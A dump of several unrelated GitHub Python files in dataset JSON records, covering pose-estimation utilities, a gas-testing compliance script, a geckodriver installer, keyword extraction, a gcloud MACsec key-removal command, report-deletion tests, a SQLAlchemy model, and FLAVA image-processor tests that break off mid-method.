1]])\n norm_thresh = thresh / f_mean\n\n kpts0 = (kpts0 - K0[[0, 1], [2, 2]][None]) / K0[[0, 1], [0, 1]][None]\n kpts1 = (kpts1 - K1[[0, 1], [2, 2]][None]) / K1[[0, 1], [0, 1]][None]\n\n if ransac:\n E, mask = cv2.findEssentialMat(\n kpts0, kpts1, np.eye(3), threshold=norm_thresh,\n prob=conf,\n method=cv2.RANSAC)\n else:\n E, mask = cv2.findFundamentalMat(\n kpts0, kpts1, method=cv2.FM_8POINT\n )\n\n ret = None\n if E is not None:\n best_num_inliers = 0\n\n for _E in np.split(E, len(E) / 3):\n n, R, t, _ = cv2.recoverPose(\n _E, kpts0, kpts1, np.eye(3), 1e9, mask=mask)\n if n > best_num_inliers:\n best_num_inliers = n\n ret = (R, t[:, 0], mask.ravel() > 0)\n return ret\n\n\ndef rotate_intrinsics(K, image_shape, rot):\n \"\"\"image_shape is the shape of the image after rotation\"\"\"\n assert rot <= 3\n h, w = image_shape[:2][::-1 if (rot % 2) else 1]\n fx, fy, cx, cy = K[0, 0], K[1, 1], K[0, 2], K[1, 2]\n rot = rot % 4\n if rot == 1:\n return np.array([[fy, 0., cy],\n [0., fx, w-1-cx],\n [0., 0., 1.]], dtype=K.dtype)\n elif rot == 2:\n return np.array([[fx, 0., w-1-cx],\n [0., fy, h-1-cy],\n [0., 0., 1.]], dtype=K.dtype)\n else: # if rot == 3:\n return np.array([[fy, 0., h-1-cy],\n [0., fx, cx],\n [0., 0., 1.]], dtype=K.dtype)\n\n\ndef rotate_pose_inplane(i_T_w, rot):\n rotation_matrices = [\n np.array([[np.cos(r), -np.sin(r), 0., 0.],\n [np.sin(r), np.cos(r), 0., 0.],\n [0., 0., 1., 0.],\n [0., 0., 0., 1.]], dtype=np.float32)\n for r in [np.deg2rad(d) for d in (0, 270, 180, 90)]\n ]\n return np.dot(rotation_matrices[rot], i_T_w)\n\n\ndef scale_intrinsics(K, scales):\n scales = np.diag([1./scales[0], 1./scales[1], 1.])\n return np.dot(scales, K)\n\n\ndef to_homogeneous(points):\n return np.concatenate([points, np.ones_like(points[:, :1])], axis=-1)\n\n\ndef angle_error_mat(R1, R2):\n cos = (np.trace(np.dot(R1.T, R2)) - 1) / 2\n cos = np.clip(cos, -1., 1.) # numercial errors can make it out of bounds\n return np.rad2deg(np.abs(np.arccos(cos)))\n\n\ndef angle_error_vec(v1, v2):\n n = np.linalg.norm(v1) * np.linalg.norm(v2)\n return np.rad2deg(np.arccos(np.clip(np.dot(v1, v2) / n, -1.0, 1.0)))\n\n\ndef compute_pose_error(T_0to1, R, t):\n R_gt = T_0to1[:3, :3]\n t_gt = T_0to1[:3, 3]\n error_t = angle_error_vec(t, t_gt)\n error_t = np.minimum(error_t, 180 - error_t) # ambiguity of E estimation\n error_R = angle_error_mat(R, R_gt)\n return error_t, error_R\n\n\ndef pose_auc(errors, thresholds):\n sort_idx = np.argsort(errors)\n errors = np.array(errors.copy())[sort_idx]\n recall = (np.arange(len(errors)) + 1) / len(errors)\n errors = np.r_[0., errors]\n recall = np.r_[0., recall]\n aucs = []\n for t in thresholds:\n last_index = np.searchsorted(errors, t)\n r = np.r_[recall[:last_index], recall[last_index-1]]\n e = np.r_[errors[:last_index], t]\n aucs.append(np.trapz(r, x=e)/t)\n return aucs\n\n\ndef matches_from_flow(flow, matchBinary, scaling=1.0):\n \"\"\"\n Retrieves the pixel coordinates of 'good' matches in source and target images, based on provided flow field\n (relating the target to the source image) and a binary mask indicating where the flow is 'good'.\n Args:\n flow: tensor of shape B, 2, H, W (will be reshaped if it is not the case). 
Flow field relating the target\n to the source image, defined in the target image coordinate system.\n binary_mask: bool mask corresponding to valid flow vectors, shape B, H, W\n scaling: scalar or list of scalar (horizontal and then vertical direction):\n scaling factor to apply to the retrieved pixel coordinates in both images.\n\n Returns:\n pixel coordinates of 'good' matches in the source image, Nx2 (numpy array)\n pixel coordinates of 'good' matches in the target image, Nx2 (numpy array)\n \"\"\"\n\n B, _, hB, wB = flow.shape\n xx = torch.arange(0, wB).view(1, -1).repeat(hB, 1)\n yy = torch.arange(0, hB).view(-1, 1).repeat(1, wB)\n xx = xx.view(1, 1, hB, wB).repeat(B, 1, 1, 1)\n yy = yy.view(1, 1, hB, wB).repeat(B, 1, 1, 1)\n grid = torch.cat((xx, yy), 1).float()\n\n if flow.is_cuda:\n grid = grid.cuda()\n matchBinary = matchBinary.cuda()\n\n mapping = flow + grid\n mapping_x = mapping.permute(0, 2, 3, 1)[:, :, :, 0]\n mapping_y = mapping.permute(0, 2, 3, 1)[:, :, :, 1]\n grid_x = grid.permute(0, 2, 3, 1)[:, :, :, 0]\n grid_y = grid.permute(0, 2, 3, 1)[:, :, :, 1]\n\n pts2 = torch.cat((grid_x[matchBinary].unsqueeze(1),\n grid_y[matchBinary].unsqueeze(1)), dim=1)\n pts1 = torch.cat((mapping_x[matchBinary].unsqueeze(1),\n mapping_y[matchBinary].unsqueeze(1)),\n dim=1) # convert to mapping and then take the correspondences\n\n return pts1.cpu().numpy()*scaling, pts2.cpu().numpy()*scaling\n","repo_name":"mattcoldwater/DM_modified","sub_path":"validation/utils_pose_estimation.py","file_name":"utils_pose_estimation.py","file_ext":"py","file_size_in_byte":7552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"3832875616","text":"import csv,datetime \nfrom datetime import datetime,timedelta\n\n\ndef check_gas_testing_time_compliance() -> bool:\n \n EntFilePath=r'C:\\Users\\prash\\Desktop\\DE\\entrant_gas_reading.csv' #Provide path for entrant_gas_reading.csv\n PerFilePath=r'C:\\Users\\prash\\Desktop\\DE\\Periodic_Reading.csv' #Provide path for periodical_gas_reading.csv\n\n Entrant = {} #Creating a dict to store Entrant gas reading \n Periodic = [] #Creating a list to store PEriodical gas reading \n\n##Read the entrant file and store in variable Dict Entrant\n EntFile = open(EntFilePath, 'r')\n EntDict = csv.DictReader(EntFile)\n for row in EntDict:\n Entrant = row\n \n ##Read the Periodic file and store in variable Periodic \n PerFile = open(PerFilePath, 'r') \n PerList = csv.reader(PerFile)\n P = list(PerList)\n for x in P:\n for y in x:\n Periodic.append(y)\n Periodic.pop(0) ##Removing Column name gas reading time from list\n\n\n complaint = False\n\n #Converting string to datetime format \n exittime = datetime.strptime(Entrant['exit time'], \"%Y-%m-%dT%H:%M:%S.%fZ\")\n entrtime = datetime.strptime(Entrant['entry time'], \"%Y-%m-%dT%H:%M:%S.%fZ\")\n entrplus30mins = datetime.strptime(Entrant['entry time'], \"%Y-%m-%dT%H:%M:%S.%fZ\") + timedelta(minutes=30)\n diff = ((exittime - entrtime).total_seconds() / 60)\n\n \n if diff >= 30: # Check if the CW is staying more than 30 mins\n if len(Periodic) > 0: # checking if the periodic entry has values\n for x in Periodic: # checking if periodic entry is in compliance\n if datetime.strptime(x,\"%Y-%m-%dT%H:%M:%S.%fZ\")>=entrtime and datetime.strptime(x,\"%Y-%m-%dT%H:%M:%S.%fZ\")<=entrplus30mins:\n # checking if the periodic read time lies between Entry time and time less than 30 mins plus entry time\n complaint = True\n \n if complaint is True:\n return True\n else:\n return False\n\nif 
__name__ == \"__main__\":\n if check_gas_testing_time_compliance():\n print(\"Compliant\")\n else:\n print(\"Not Compliant\")\n","repo_name":"prashbala27/Codingtestsolution","sub_path":"MagellanX_Enclosed_Space_Entry_Compliant_Test.py","file_name":"MagellanX_Enclosed_Space_Entry_Compliant_Test.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"20447859773","text":"# coding: utf-8\n\nimport os\nimport logging\nfrom . import utils\n\n\ndef install(cwd=False):\n \"\"\"\n Appends the directory of the geckodriver binary file to PATH.\n\n :param cwd: Flag indicating whether to download to current working directory\n :return: The file path of geckodriver\n \"\"\"\n geckodriver_filepath = utils.download_geckodriver(cwd)\n if not geckodriver_filepath:\n logging.debug('Can not download geckodriver.')\n return\n geckodriver_dir = os.path.dirname(geckodriver_filepath)\n if 'PATH' not in os.environ:\n os.environ['PATH'] = geckodriver_dir\n elif geckodriver_dir not in os.environ['PATH']:\n os.environ['PATH'] = geckodriver_dir + utils.get_variable_separator() + os.environ['PATH']\n return geckodriver_filepath\n\n\ndef get_firefox_version():\n \"\"\"\n Get installed version of chrome on client\n\n :return: The version of chrome\n \"\"\"\n return utils.get_firefox_version()\n","repo_name":"yeongbin-jo/python-geckodriver-autoinstaller","sub_path":"geckodriver_autoinstaller/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"85"} +{"seq_id":"19900571196","text":"from sentence_transformers import SentenceTransformer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport numpy as np\nimport itertools\nfrom transformers import AutoTokenizer, AutoModel\n\n\ndef words_distance(string, word, words, n, nc):\n\twords_d = cosine_similarity(word, word)\n\tidx = list(cosine_similarity(string, word).argsort()[0][-nc:])\n \n\twords_of_interest = words_d[np.ix_(idx, idx)]\n\tsum_dist_min=1*10**100\n\ttmp = None\n\tfor c in itertools.combinations(range(len(idx)), n):\n\t\tsum_dist_act = sum([words_of_interest[m][n] for m, n in zip(c, c) if not m == n])\n\t\tif sum_dist_act < sum_dist_min: tmp = c; sum_dist_min = sum_dist_act\n\n\treturn [[words[y] for y in idx][i] for i in tmp]\n\n\ndef word_extraction(string, size=(1, 1), n=5, c=5):\n\twords_vectorize = CountVectorizer(ngram_range=size).fit([string]).get_feature_names()\n\tmodel = SentenceTransformer('distilbert-base-nli-mean-tokens')\n\treturn words_distance(model.encode([string]), model.encode(words_vectorize), words_vectorize, n, c)\n\n","repo_name":"AIDRI/ENCY-AI","sub_path":"src/AI/not_util/word_extraction.py","file_name":"word_extraction.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"20191771604","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.api_lib.compute import base_classes\nfrom googlecloudsdk.api_lib.compute.interconnects import client\nfrom googlecloudsdk.calliope import base\nfrom googlecloudsdk.command_lib.compute.interconnects import flags\n\nDETAILED_HELP = {\n 'DESCRIPTION':\n \"\"\"\\\n *{command}* is used to remove pre-shared key from MACsec configuration 
of\n interconnect.\n\n For an example, refer to the *EXAMPLES* section below.\n \"\"\",\n # pylint: disable=line-too-long\n 'EXAMPLES':\n \"\"\"\\\n To remove a pre-shared key from MACsec configuration, run:\n\n $ {command} example-interconnect --key-name=default-key\n \"\"\",\n # pylint: enable=line-too-long\n}\n\n\n@base.ReleaseTracks(base.ReleaseTrack.ALPHA, base.ReleaseTrack.BETA)\nclass RemoveKey(base.UpdateCommand):\n \"\"\"Remove pre-shared key from a Compute Engine interconnect MACsec configuration.\n\n *{command}* is used to remove pre-shared key from MACsec configuration of\n interconnect.\n \"\"\"\n\n INTERCONNECT_ARG = None\n\n @classmethod\n def Args(cls, parser):\n cls.INTERCONNECT_ARG = flags.InterconnectArgument()\n cls.INTERCONNECT_ARG.AddArgument(parser, operation_type='update')\n\n flags.AddMacsecPreSharedKeyNameForRomoveKey(parser)\n\n def Collection(self):\n return 'compute.interconnects'\n\n def Run(self, args):\n holder = base_classes.ComputeApiHolder(self.ReleaseTrack())\n ref = self.INTERCONNECT_ARG.ResolveAsResource(args, holder.resources)\n interconnect = client.Interconnect(ref, compute_client=holder.client)\n\n macsec = interconnect.Describe().macsec\n keys = macsec.preSharedKeys\n macsec.preSharedKeys = [key for key in keys if key.name != args.key_name]\n\n return interconnect.PatchAlphaBeta(\n description=None,\n interconnect_type=None,\n requested_link_count=None,\n link_type=None,\n admin_enabled=None,\n noc_contact_email=None,\n location=None,\n labels=None,\n label_fingerprint=None,\n macsec_enabled=None,\n macsec=macsec)\n\n\nRemoveKey.detailed_help = DETAILED_HELP\n","repo_name":"google-cloud-sdk-unofficial/google-cloud-sdk","sub_path":"lib/surface/compute/interconnects/macsec/remove_key.py","file_name":"remove_key.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"85"} +{"seq_id":"33491389919","text":"import unittest\nimport os\nimport copy\n\nfrom dotenv import load_dotenv\nfrom pathlib import Path\nfrom premembers.reports.batch import reports\nfrom premembers.repository import pm_reports\nfrom premembers.repository import pm_organizationTasks\nfrom premembers.common import common_utils\nfrom premembers.repository.const import Status\n\ntrace_id = \"eb3b5f76-8945-11e7-b15a-8f7e5433dada\"\nuser_id = common_utils.get_uuid4()\nmail_address = \"test-user{}@example.com\"\norganization_id = \"reports-78ee-11e7-89e6-OrganizationID\"\nproject_id = \"reports-77f1-11e7-adfe-ProjectID\"\nreport_id = \"reports-77f1-11e7-adfe-ReportID{}\"\nlog_id = \"reports-77f1-11e7-adfe-LogID{}\"\ntask_id = \"reports-77f1-11e7-adfe-TaskID{}\"\n\nreports_template = {\n \"ReportID\": report_id,\n \"ReportName\": \"reportName\",\n \"GenerateUser\": mail_address.format(str(0)),\n \"AWSAccounts\": [\"awsAccounts1\", \"awsAccounts2\", \"awsAccounts3\"],\n \"Status\": 0,\n \"ResourceInfoPath\": \"resourceInfoPathid\",\n \"JsonOutputPath\": \"jsonOutputPath\",\n \"JsonOutputTime\": \"jsonOutputTimeid\",\n \"HTMLOutputStatus\": 0,\n \"HTMLPath\": \"htmlPath\",\n \"HTMLOutputTime\": \"htmlOutputTime\",\n \"ExcelOutputStatus\": 0,\n \"ExcelPath\": \"7659CD67-03C1-423D-BDDA-6B7C5AF8B247/report/ja-JP/TESTREPORT.xlsx\",\n \"ExcelOutputTime\": \"excelOutputTime\",\n \"SchemaVersion\": 1,\n \"OrganizationID\": organization_id,\n \"ProjectID\": project_id\n}\n\ntask_code = \"DELETE_REPORT\"\norganization_task_template = {\n \"TaskID\": task_id,\n \"Code\": task_code,\n \"Target\": report_id,\n \"UserID\": 
user_id,\n \"MailAddress\": mail_address.format(str(0)),\n \"TaskStatus\": 0,\n \"RetryCount\": 1,\n \"MaxRetry\": 10,\n}\n\nreport_log_template = {\n 'ReportID': report_id,\n 'LogID': log_id,\n 'Code': \"Code\",\n 'UserID': user_id,\n 'MailAddress': mail_address.format(str(0)),\n 'JobID': common_utils.get_uuid4(),\n 'Parameter': None,\n 'LogStreamName': None\n}\n\n\nclass TestReports(unittest.TestCase):\n def setUp(self):\n dotenv_path = Path(os.getcwd()).joinpath('.env')\n if os.path.exists(dotenv_path):\n load_dotenv(dotenv_path)\n\n num = 1\n while num < 7:\n # Create Report\n tmp_report = copy.copy(reports_template)\n pm_reports.create_report(\n trace_id, tmp_report['ReportID'].format(str(num)),\n tmp_report['ReportName'], tmp_report['GenerateUser'],\n tmp_report['AWSAccounts'], 4, tmp_report['ResourceInfoPath'],\n tmp_report['JsonOutputPath'], tmp_report['JsonOutputTime'],\n tmp_report['HTMLOutputStatus'], tmp_report['HTMLPath'],\n tmp_report['HTMLOutputTime'], 2, tmp_report['ExcelPath'],\n tmp_report['ExcelOutputTime'], tmp_report['SchemaVersion'],\n tmp_report['OrganizationID'], tmp_report['ProjectID'])\n\n # Create organization task\n tmp_organization_task = copy.copy(organization_task_template)\n tmp_organization_task['TaskStatus'] = num\n if (num == 3 and num == 6):\n tmp_organization_task['TaskStatus'] = 0\n elif (num == 4):\n tmp_organization_task['TaskStatus'] = -1\n elif (num == 5):\n tmp_organization_task['TaskStatus'] = -1\n tmp_organization_task['RetryCount'] = tmp_organization_task['MaxRetry'] + 1\n\n pm_organizationTasks.create_organizationTask(\n trace_id, tmp_organization_task['TaskID'].format(str(num)),\n tmp_organization_task['Code'],\n tmp_organization_task['Target'].format(str(num)),\n tmp_organization_task['UserID'],\n tmp_organization_task['MailAddress'],\n tmp_organization_task['TaskStatus'],\n tmp_organization_task['RetryCount'],\n tmp_organization_task['MaxRetry'])\n num += 1\n\n def tearDown(self):\n num = 1\n while num < 7:\n pm_organizationTasks.delete(trace_id, task_id.format(str(num)))\n pm_reports.delete_reports(trace_id, report_id.format(str(num)))\n num += 1\n\n def test_batch_delete_reports_susscess(self):\n # Status = 0 Waiting\n event_mock = {\n 'TaskId': task_id.format(str(3)),\n 'Message': {\n 'MessageId': 'MessageId',\n 'ReceiptHandle': 'ReceiptHandle'\n }\n }\n reports.execute_delete_report_handler(event_mock, {})\n # Get data in database\n organization_task = pm_organizationTasks.query_key(task_id.format(str(3)))\n # Check data\n self.assertEqual(int(organization_task['TaskStatus']), Status.Done.value)\n\n # Status = 4 ERROR and RetryCount < MaxRetry\n event_mock['TaskId'] = task_id.format(str(4))\n reports.execute_delete_report_handler(event_mock, {})\n # Get data in database\n organization_task = pm_organizationTasks.query_key(task_id.format(str(4)))\n # Check data\n self.assertEqual(organization_task['TaskStatus'], Status.Done.value)\n\n def test_batch_delete_reports_error_status_task(self):\n # Status = 1 Running\n event_mock = {\n 'TaskId': task_id.format(str(1)),\n 'Message': {\n 'MessageId': 'MessageId',\n 'ReceiptHandle': 'ReceiptHandle'\n }\n }\n reports.execute_delete_report_handler(event_mock, {})\n # Get data in database\n organization_task = pm_organizationTasks.query_key(task_id.format(str(1)))\n # Check data\n self.assertEqual(organization_task['TaskStatus'], Status.Error.value)\n\n # Status = 2 Done\n event_mock['TaskId'] = task_id.format(str(2))\n reports.execute_delete_report_handler(event_mock, {})\n # Get data in database\n 
organization_task = pm_organizationTasks.query_key(task_id.format(str(2)))\n # Check data\n self.assertEqual(organization_task['TaskStatus'], Status.Error.value)\n\n # Status = -1 ERROR and RetryCount > MaxRetry\n event_mock['TaskId'] = task_id.format(str(5))\n reports.execute_delete_report_handler(event_mock, {})\n # Get data in database\n organization_task = pm_organizationTasks.query_key(task_id.format(str(5)))\n # Check data\n self.assertEqual(organization_task['TaskStatus'], Status.Error.value)\n","repo_name":"nisheeth84/prjs_sample","sub_path":"reference-code/lambda/cm-premembers-backend/tests/reports/batch/test_reports.py","file_name":"test_reports.py","file_ext":"py","file_size_in_byte":6400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"36142457467","text":"from .db import db\nfrom sqlalchemy import func\n\n\nclass Song(db.Model):\n __tablename__ = 'songs'\n\n id = db.Column(db.Integer, primary_key=True, nullable=False)\n title = db.Column(db.String(40), nullable=False)\n file_url = db.Column(db.String(500))\n song_img = db.Column(db.String(255))\n musician_id = db.Column(db.Integer, db.ForeignKey('musicians.id'))\n created_at = db.Column(db.DateTime(timezone=True),\n nullable=False, server_default=func.now())\n updated_at = db.Column(db.DateTime(timezone=True),\n nullable=False, server_default=func.now())\n\n musicians = db.relationship('Musician', back_populates='songs')\n comments = db.relationship('Comment', back_populates='songs')\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'title': self.title,\n 'file_url': self.file_url,\n 'song_img': self.song_img,\n 'musician_id': self.musician_id,\n 'created_at': self.created_at,\n 'updated_at': self.updated_at,\n }\n","repo_name":"brancifortnick/medley-sesh","sub_path":"app/models/song.py","file_name":"song.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"28705398404","text":"import random\nimport unittest\n\nimport numpy as np\n\nfrom transformers.testing_utils import require_torch, require_vision\nfrom transformers.utils import is_torch_available, is_vision_available\n\nfrom ...test_image_processing_common import ImageProcessingTestMixin, prepare_image_inputs\n\n\nif is_torch_available():\n import torch\n\nif is_vision_available():\n import PIL\n\n from transformers import FlavaImageProcessor\n from transformers.image_utils import PILImageResampling\n from transformers.models.flava.image_processing_flava import (\n FLAVA_CODEBOOK_MEAN,\n FLAVA_CODEBOOK_STD,\n FLAVA_IMAGE_MEAN,\n FLAVA_IMAGE_STD,\n )\nelse:\n FLAVA_IMAGE_MEAN = FLAVA_IMAGE_STD = FLAVA_CODEBOOK_MEAN = FLAVA_CODEBOOK_STD = None\n\n\nclass FlavaImageProcessingTester(unittest.TestCase):\n def __init__(\n self,\n parent,\n batch_size=7,\n num_channels=3,\n min_resolution=30,\n max_resolution=400,\n do_resize=True,\n size=None,\n do_center_crop=True,\n crop_size=None,\n resample=None,\n do_rescale=True,\n rescale_factor=1 / 255,\n do_normalize=True,\n image_mean=FLAVA_IMAGE_MEAN,\n image_std=FLAVA_IMAGE_STD,\n input_size_patches=14,\n total_mask_patches=75,\n mask_group_max_patches=None,\n mask_group_min_patches=16,\n mask_group_min_aspect_ratio=0.3,\n mask_group_max_aspect_ratio=None,\n codebook_do_resize=True,\n codebook_size=None,\n codebook_resample=None,\n codebook_do_center_crop=True,\n codebook_crop_size=None,\n codebook_do_map_pixels=True,\n codebook_do_normalize=True,\n 
codebook_image_mean=FLAVA_CODEBOOK_MEAN,\n codebook_image_std=FLAVA_CODEBOOK_STD,\n ):\n size = size if size is not None else {\"height\": 224, \"width\": 224}\n crop_size = crop_size if crop_size is not None else {\"height\": 224, \"width\": 224}\n codebook_size = codebook_size if codebook_size is not None else {\"height\": 112, \"width\": 112}\n codebook_crop_size = codebook_crop_size if codebook_crop_size is not None else {\"height\": 112, \"width\": 112}\n\n self.parent = parent\n self.batch_size = batch_size\n self.num_channels = num_channels\n self.do_resize = do_resize\n self.do_rescale = do_rescale\n self.rescale_factor = rescale_factor\n self.min_resolution = min_resolution\n self.max_resolution = max_resolution\n self.size = size\n self.resample = resample if resample is not None else PILImageResampling.BICUBIC\n self.do_normalize = do_normalize\n self.image_mean = image_mean\n self.image_std = image_std\n self.do_center_crop = do_center_crop\n self.crop_size = crop_size\n\n self.input_size_patches = input_size_patches\n self.total_mask_patches = total_mask_patches\n self.mask_group_max_patches = mask_group_max_patches\n self.mask_group_min_patches = mask_group_min_patches\n self.mask_group_min_aspect_ratio = mask_group_min_aspect_ratio\n self.mask_group_max_aspect_ratio = mask_group_max_aspect_ratio\n\n self.codebook_do_resize = codebook_do_resize\n self.codebook_size = codebook_size\n self.codebook_resample = codebook_resample if codebook_resample is not None else PILImageResampling.LANCZOS\n self.codebook_do_center_crop = codebook_do_center_crop\n self.codebook_crop_size = codebook_crop_size\n self.codebook_do_map_pixels = codebook_do_map_pixels\n self.codebook_do_normalize = codebook_do_normalize\n self.codebook_image_mean = codebook_image_mean\n self.codebook_image_std = codebook_image_std\n\n def prepare_image_processor_dict(self):\n return {\n \"image_mean\": self.image_mean,\n \"image_std\": self.image_std,\n \"do_normalize\": self.do_normalize,\n \"do_resize\": self.do_resize,\n \"size\": self.size,\n \"resample\": self.resample,\n \"do_rescale\": self.do_rescale,\n \"rescale_factor\": self.rescale_factor,\n \"do_center_crop\": self.do_center_crop,\n \"crop_size\": self.crop_size,\n \"input_size_patches\": self.input_size_patches,\n \"total_mask_patches\": self.total_mask_patches,\n \"mask_group_max_patches\": self.mask_group_max_patches,\n \"mask_group_min_patches\": self.mask_group_min_patches,\n \"mask_group_min_aspect_ratio\": self.mask_group_min_aspect_ratio,\n \"mask_group_max_aspect_ratio\": self.mask_group_min_aspect_ratio,\n \"codebook_do_resize\": self.codebook_do_resize,\n \"codebook_size\": self.codebook_size,\n \"codebook_resample\": self.codebook_resample,\n \"codebook_do_center_crop\": self.codebook_do_center_crop,\n \"codebook_crop_size\": self.codebook_crop_size,\n \"codebook_do_map_pixels\": self.codebook_do_map_pixels,\n \"codebook_do_normalize\": self.codebook_do_normalize,\n \"codebook_image_mean\": self.codebook_image_mean,\n \"codebook_image_std\": self.codebook_image_std,\n }\n\n def get_expected_image_size(self):\n return (self.size[\"height\"], self.size[\"width\"])\n\n def get_expected_mask_size(self):\n return (\n (self.input_size_patches, self.input_size_patches)\n if not isinstance(self.input_size_patches, tuple)\n else self.input_size_patches\n )\n\n def get_expected_codebook_image_size(self):\n return (self.codebook_size[\"height\"], self.codebook_size[\"width\"])\n\n def prepare_image_inputs(self, equal_resolution=False, numpify=False, 
torchify=False):\n return prepare_image_inputs(\n batch_size=self.batch_size,\n num_channels=self.num_channels,\n min_resolution=self.min_resolution,\n max_resolution=self.max_resolution,\n equal_resolution=equal_resolution,\n numpify=numpify,\n torchify=torchify,\n )\n\n\n@require_torch\n@require_vision\nclass FlavaImageProcessingTest(ImageProcessingTestMixin, unittest.TestCase):\n image_processing_class = FlavaImageProcessor if is_vision_available() else None\n maxDiff = None\n\n def setUp(self):\n self.image_processor_tester = FlavaImageProcessingTester(self)\n\n @property\n def image_processor_dict(self):\n return self.image_processor_tester.prepare_image_processor_dict()\n\n def test_image_processor_properties(self):\n image_processing = self.image_processing_class(**self.image_processor_dict)\n self.assertTrue(hasattr(image_processing, \"image_mean\"))\n self.assertTrue(hasattr(image_processing, \"image_std\"))\n self.assertTrue(hasattr(image_processing, \"do_normalize\"))\n self.assertTrue(hasattr(image_processing, \"do_resize\"))\n self.assertTrue(hasattr(image_processing, \"resample\"))\n self.assertTrue(hasattr(image_processing, \"crop_size\"))\n self.assertTrue(hasattr(image_processing, \"do_center_crop\"))\n self.assertTrue(hasattr(image_processing, \"do_rescale\"))\n self.assertTrue(hasattr(image_processing, \"rescale_factor\"))\n self.assertTrue(hasattr(image_processing, \"masking_generator\"))\n self.assertTrue(hasattr(image_processing, \"codebook_do_resize\"))\n self.assertTrue(hasattr(image_processing, \"codebook_size\"))\n self.assertTrue(hasattr(image_processing, \"codebook_resample\"))\n self.assertTrue(hasattr(image_processing, \"codebook_do_center_crop\"))\n self.assertTrue(hasattr(image_processing, \"codebook_crop_size\"))\n self.assertTrue(hasattr(image_processing, \"codebook_do_map_pixels\"))\n self.assertTrue(hasattr(image_processing, \"codebook_do_normalize\"))\n self.assertTrue(hasattr(image_processing, \"codebook_image_mean\"))\n self.assertTrue(hasattr(image_processing, \"codebook_image_std\"))\n\n def test_image_processor_from_dict_with_kwargs(self):\n image_processor = self.image_processing_class.from_dict(self.image_processor_dict)\n self.assertEqual(image_processor.size, {\"height\": 224, \"width\": 224})\n self.assertEqual(image_processor.crop_size, {\"height\": 224, \"width\": 224})\n self.assertEqual(image_processor.codebook_size, {\"height\": 112, \"width\": 112})\n self.assertEqual(image_processor.codebook_crop_size, {\"height\": 112, \"width\": 112})\n\n image_processor = self.image_processing_class.from_dict(\n self.image_processor_dict, size=42, crop_size=84, codebook_size=33, codebook_crop_size=66\n )\n self.assertEqual(image_processor.size, {\"height\": 42, \"width\": 42})\n self.assertEqual(image_processor.crop_size, {\"height\": 84, \"width\": 84})\n self.assertEqual(image_processor.codebook_size, {\"height\": 33, \"width\": 33})\n self.assertEqual(image_processor.codebook_crop_size, {\"height\": 66, \"width\": 66})\n\n def test_call_pil(self):\n # Initialize image_processing\n image_processing = self.image_processing_class(**self.image_processor_dict)\n # create random PIL images\n image_inputs = self.image_processor_tester.prepare_image_inputs(equal_resolution=False)\n for image in image_inputs:\n self.assertIsInstance(image, PIL.Image.Image)\n\n # Test not batched input\n encoded_images = image_processing(image_inputs[0], return_tensors=\"pt\")\n\n # Test no bool masked pos\n self.assertFalse(\"bool_masked_pos\" in encoded_images)\n\n 
expected_height, expected_width = self.image_processor_tester.get_expected_image_size()\n\n self.assertEqual(\n encoded_images.pixel_values.shape,\n (1, self.image_processor_tester.num_channels, expected_height, expected_width),\n )\n\n # Test batched\n encoded_images = image_processing(image_inputs, return_tensors=\"pt\")\n expected_height, expected_width = self.image_processor_tester.get_expected_image_size()\n\n # Test no bool masked pos\n self.assertFalse(\"bool_masked_pos\" in encoded_images)\n\n self.assertEqual(\n encoded_images.pixel_values.shape,\n (\n self.image_processor_tester.batch_size,\n self.image_processor_tester.num_channels,\n expected_height,\n expected_width,\n ),\n )\n\n def _test_call_framework(self, instance_class, prepare_kwargs):\n # Initialize image_processing\n image_processing = self.image_processing_class(**self.image_processor_dict)\n # create random tensors\n image_inputs = self.image_processor_tester.prepare_image_inputs(equal_resolution=False, **prepare_kwargs)\n for image in image_inputs:\n self.assertIsInstance(image, instance_class)\n\n # Test not batched input\n encoded_images = image_processing(image_inputs[0], return_tensors=\"pt\")\n\n expected_height, expected_width = self.image_processor_tester.get_expected_image_size()\n self.assertEqual(\n encoded_images.pixel_values.shape,\n (1, self.image_processor_tester.num_channels, expected_height, expected_width),\n )\n\n encoded_images = image_processing(image_inputs, return_image_mask=True, return_tensors=\"pt\")\n\n expected_height, expected_width = self.image_processor_tester.get_expected_image_size()\n self.assertEqual(\n encoded_images.pixel_values.shape,\n (\n self.image_processor_tester.batch_size,\n self.image_processor_tester.num_channels,\n expected_height,\n expected_width,\n ),\n )\n\n expected_height, expected_width = self.image_processor_tester.get_expected_mask_size()\n self.assertEqual(\n encoded_images.bool_masked_pos.shape,\n (\n self.image_processor_tester.batch_size,\n expected_height,\n expected_width,\n ),\n )\n\n # Test batched\n encoded_images = image_processing(image_inputs, return_tensors=\"pt\").pixel_values\n\n expected_height, expected_width = self.image_processor_tester.get_expected_image_size()\n self.assertEqual(\n encoded_images.shape,\n (\n self.image_processor_tester.batch_size,\n self.image_processor_tester.num_channels,\n expected_height,\n expected_width,\n ),\n )\n\n # Test masking\n encoded_images = image_processing(image_inputs, return_image_mask=True, return_tensors=\"pt\")\n\n expected_height, expected_width = self.image_processor_tester.get_expected_image_size()\n self.assertEqual(\n encoded_images.pixel_values.shape,\n (\n self.image_processor_tester.batch_size,\n self.image_processor_tester.num_channels,\n expected_height,\n expected_width,\n ),\n )\n\n expected_height, expected_width = self.image_processor_tester.get_expected_mask_size()\n self.assertEqual(\n encoded_images.bool_masked_pos.shape,\n (\n self.image_processor_tester.batch_size,\n expected_height,\n expected_width,\n ),\n )\n\n def test_call_numpy(self):\n 